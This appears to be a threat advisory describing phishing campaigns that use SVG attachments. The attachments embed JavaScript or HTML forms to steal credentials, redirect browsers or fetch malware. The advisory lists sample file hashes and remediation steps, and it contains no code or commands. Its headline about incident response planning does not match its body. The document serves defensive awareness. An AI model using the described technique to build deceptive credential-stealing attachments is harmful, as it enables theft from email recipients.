May 16, 2025
Proactive Defense: The Importance of Incident Response Planning in Cybersecurity
Severity
High
Analysis Summary
Scalable Vector Graphics (SVG) attachments are being used more often by threat actors to distribute malware or show phishing forms without being discovered. JPG and PNG files, which are composed of grids of tiny squares called pixels, make up the majority of photos on the internet. The entire image is made up of pixels, each of which has a distinct color value.
SVG uses lines, shapes, and text that are described in textual mathematical formulas in the code to make graphics rather than pixels. Because they are vector graphics, they automatically adjust in size without sacrificing shape or image quality, which makes them perfect for use in browser applications with varying resolutions.
SVG attachments have long been used in phishing attempts; researchers have documented their use in earlier QBot malware attacks and as a means of concealing harmful scripts. The versatility of SVG attachments is demonstrated by these and other samples that have been seen. In addition to displaying graphics, they can also be used to display HTML using the <foreignObject> element and run JavaScript when the graphic is loaded.
This enables threat actors to produce SVG attachments that generate phishing forms to steal credentials in addition to displaying images. A recent SVG attachment, as shown below, shows a phony Excel spreadsheet with an integrated login form that, when filled out, transmits the information to the threat actors.
Other SVG attachments used in a recent campaign trick users into clicking the download button, which downloads malware from a remote website, by posing as official documents or requests for more information. When an image is opened, other campaigns use SVG files and embedded JavaScript to automatically reroute browsers to websites that host phishing forms.
The issue is that security software rarely detects these files because they are primarily just textual representations of images. At most, security software detects one or two of the samples that were uploaded to VirusTotal. Having said that, authentic emails rarely include SVG attachments, so users should be suspicious of them at once. It is safest to remove any emails that contain these kinds of attachments unless you are a developer and anticipate receiving them.
Impact
- Credential Theft
- Security Bypass
- Unauthorized Access
Indicators of Compromise
MD5
- d3acfbea0cfc732e819301c490b3bb89
- 62fe867077a03214208fa5c9f9f1c743
- c3bd20a26cad5cd8d5ff8174f70966f0
SHA-256
- ae08802026984b53438e1b3b2f2aa21839c165fae88493bfb8f31c4d064b7068
- 06f49c74464fb6a4e3d5db59a7da616feae660c50ae74fdee9b4fc0f94730c51
- 0e857464f66465ad0308d8f779b2448a0a4575556e2cffee2e574ce99ddf18ad
SHA1
- 28c089a180a3981555da829f69f4728ff55b6e30
- dc6fdf0eee07fb6d57d140f7eafcad376a01968f
- 0a32570679a73a5852b48473646e72f37c46577c
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
- Patch and upgrade any platforms and software timely and make it into a standard security policy.
- Employ network intrusion detection and prevention systems to monitor and block malicious network activities.
- Implement network segmentation to limit lateral movement for attackers within the network.
- Never trust or open links and attachments received from unknown sources/senders.
- Implement advanced email filtering to detect and block phishing emails.
- Employ updated and robust endpoint protection solutions to detect and block malware.
- Develop and test an incident response plan to ensure a swift and effective response to security incidents.
- Enhance logging and monitoring capabilities to detect anomalous activities and unauthorized access.
- Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.
- Regularly back up critical data and ensure that backup and recovery procedures are in place.
